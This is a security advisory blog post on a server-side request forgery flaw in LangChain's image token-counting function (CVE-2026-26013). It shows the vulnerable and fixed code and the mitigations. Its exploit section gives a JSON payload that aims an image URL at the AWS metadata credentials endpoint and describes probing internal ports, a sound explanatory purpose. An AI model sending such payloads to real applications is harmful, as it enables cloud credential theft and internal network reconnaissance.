CVE-2026-26013: When Your AI Assistant Browses Your Intranet
Feb 11, 2026·6 min read·6 visits
Executive Summary (TL;DR)
LangChain's `ChatOpenAI` component contained an SSRF vulnerability in its token counting logic. To estimate costs for vision models, the library automatically fetched images from URLs provided in prompts. This allowed attackers to force the server to request internal resources (like AWS metadata or localhost). Fixed in `langchain-core` 1.2.11.
In the race to build the ultimate AI agent, developers often overlook the plumbing. CVE-2026-26013 is a classic Server-Side Request Forgery (SSRF) vulnerability nestled deep within LangChain's utility functions. Specifically, the logic used to calculate token costs for OpenAI's vision models inadvertently turned the library into an open proxy. By tricking the `ChatOpenAI` component into 'measuring' an image hosted on an internal server, attackers could force the application to scan local networks or ping cloud metadata services. It’s a stark reminder that even 'helper' functions need to treat user input like a biological hazard.
The Hook: The Price of Pixels
In the modern LLM economy, tokens are currency. Developers are obsessed with counting them before sending requests to OpenAI to avoid bankruptcy. Text is easy—just count the subwords. But images? Images are tricky.
OpenAI's GPT-4o and GPT-4-turbo vision models price images based on their dimensions. A 512x512 image costs fewer tokens than a 2048x2048 one. To help developers estimate these costs locally, LangChain introduced a convenience method: get_num_tokens_from_messages().
Here is the logic: If a user sends a prompt with an image URL, LangChain grabs the image, checks the height and width, and calculates the token cost. It sounds helpful, benign even. But from a security perspective, it's a nightmare. The library was effectively saying, "Give me a URL, and I will make a server-side HTTP request to it." In the security world, we call this a 'feature' right up until it becomes a CVE.
The Flaw: Blind Trust
The vulnerability (CWE-918) stems from a lack of boundary checks in the _url_to_size helper function. When you pass a message history to the token counter, LangChain iterates through it. If it spots a type: image_url, it extracts the URL and immediately fires an HTTP GET request.
There was no whitelist. There was no blacklist. There was no check to see if the IP resolved to 127.0.0.1 or the infamous 169.254.169.254 (cloud metadata). The code assumed that if you are asking to count tokens for an image, you must be pointing to a valid, public image.
This is a classic blind SSRF scenario. While the attacker might not get the content of the response back (because the code tries to parse the response as an image using Pillow), the side effects are dangerous enough. The server performs the handshake, sends the headers, and downloads the body. This allows an attacker to map internal ports (based on response time), trigger internal APIs that act on GET requests, or perform Denial of Service by pointing the tokenizer at a 10GB file.
The Code: Autopsy of a Request
Let's look at the vulnerable code path in libs/partners/openai/langchain_openai/chat_models/base.py. The logic was devastatingly simple. It used httpx to fetch the resource without hesitation.
Vulnerable Implementation:
def _url_to_size(image_source: str) -> tuple[int, int] | None:
# No validation. Just fetch.
response = httpx.get(image_source)
response.raise_for_status()
# Pass bytes to Pillow to get dimensions
return Image.open(BytesIO(response.content)).sizeThe fix, introduced in commit 2b4b1dc29a833d4053deba4c2b77a3848c834565, is a lesson in defensive programming. The maintainers didn't just add a regex; they introduced a dedicated security module langchain_core._security._ssrf_protection.
Fixed Implementation:
from langchain_core._security._ssrf_protection import validate_safe_url
def _url_to_size(image_source: str) -> tuple[int, int] | None:
try:
# 1. Validate the URL before connection
validate_safe_url(image_source, allow_private=False, allow_http=True)
# 2. Add timeouts to prevent hanging
with httpx.Client(timeout=5.0) as client:
response = client.get(image_source)
# 3. Check content size (50MB limit matching OpenAI)
# ... (size checks) ...
except (ValueError, httpx.RequestError):
return NoneThe validate_safe_url function does the heavy lifting: it resolves the DNS (preventing DNS rebinding attacks) and checks if the resulting IP falls into private ranges (RFC 1918) or loopback addresses.
The Exploit: Poking the Bear
Exploiting this requires an application that allows user-controlled message history or uses an agent that processes external content. Imagine a "Receipt Scanner AI" that accepts image URLs.
The Attack Vector:
- Reconnaissance: The attacker identifies that the backend is using LangChain by analyzing error messages or behavior (e.g., precise token counts returned in debug logs).
- Payload Construction: The attacker crafts a request pretending to provide an image, but actually pointing to the AWS metadata service.
{
"messages": [
{
"role": "user",
"content": [
{"type": "text", "text": "Analyze this receipt"},
{
"type": "image_url",
"image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
}
]
}
]
}- Trigger: The application calls
chat.get_num_tokens_from_messages(messages)to check if the prompt fits the context window. - Execution: LangChain sends a GET request to the metadata IP.
- Result:
- Best Case (for Attacker): The application throws an error containing the response body:
Error: cannot identify image file <AWS_CREDENTIALS_BLOB>. This leaks the credentials directly. - Blind Case: The application simply errors out or hangs. The attacker repeats this with different ports (
localhost:22,localhost:5432) to map the internal network topology based on response latency.
- Best Case (for Attacker): The application throws an error containing the response body:
The Impact: Why Low Severity Still Hurts
The CVSS score is 3.7 (Low) primarily because the Confidentiality impact is rated None/Low depending on the specific implementation. Since the function expects an image, it usually discards non-image data (like JSON from a metadata service) before the attacker sees it.
However, do not let the "Low" severity fool you. In a cloud environment, SSRF is a gateway drug. If an attacker can trigger requests from your backend, they can:
- Bypass Firewalls: Access internal admin panels (e.g., Jenkins, Kubernetes API) that are whitelisted for the server's IP.
- Cloud Enumeration: Even blind SSRF can confirm the existence of specific IAM roles or instance configurations.
- Denial of Service: By pointing the URL to a resource that returns an infinite stream of data (like
/dev/urandomexposed over HTTP), they can exhaust the memory of the Python process attempting to load it intoBytesIO.
The Fix: Locking Down the Library
Remediation is straightforward but urgent. You must update langchain-core to version 1.2.11 or higher. The patch includes robust SSRF protections that are enabled by default.
If you cannot upgrade immediately, or if you are paranoid (which you should be), you can disable this behavior entirely in your code:
# explicitly disable fetching
token_count = chat.get_num_tokens_from_messages(
messages,
allow_fetching_images=False
)This flag forces LangChain to skip the download and use a default/fallback calculation for token usage, preventing the network request altogether. It makes your token counts slightly less accurate for images, but it keeps your internal network private. A worthy trade-off.
Official Patches
Fix Analysis (1)
Technical Appendix
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:LAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
langchain-core LangChain AI | < 1.2.11 | 1.2.11 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-918 |
| Attack Vector | Network |
| CVSS v3.1 | 3.7 (Low) |
| Impact | Blind SSRF, Internal Scanning |
| Vulnerable Method | get_num_tokens_from_messages |
| Fix Commit | 2b4b1dc29a833d4053deba4c2b77a3848c834565 |
MITRE ATT&CK Mapping
Server-Side Request Forgery (SSRF) occurs when a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.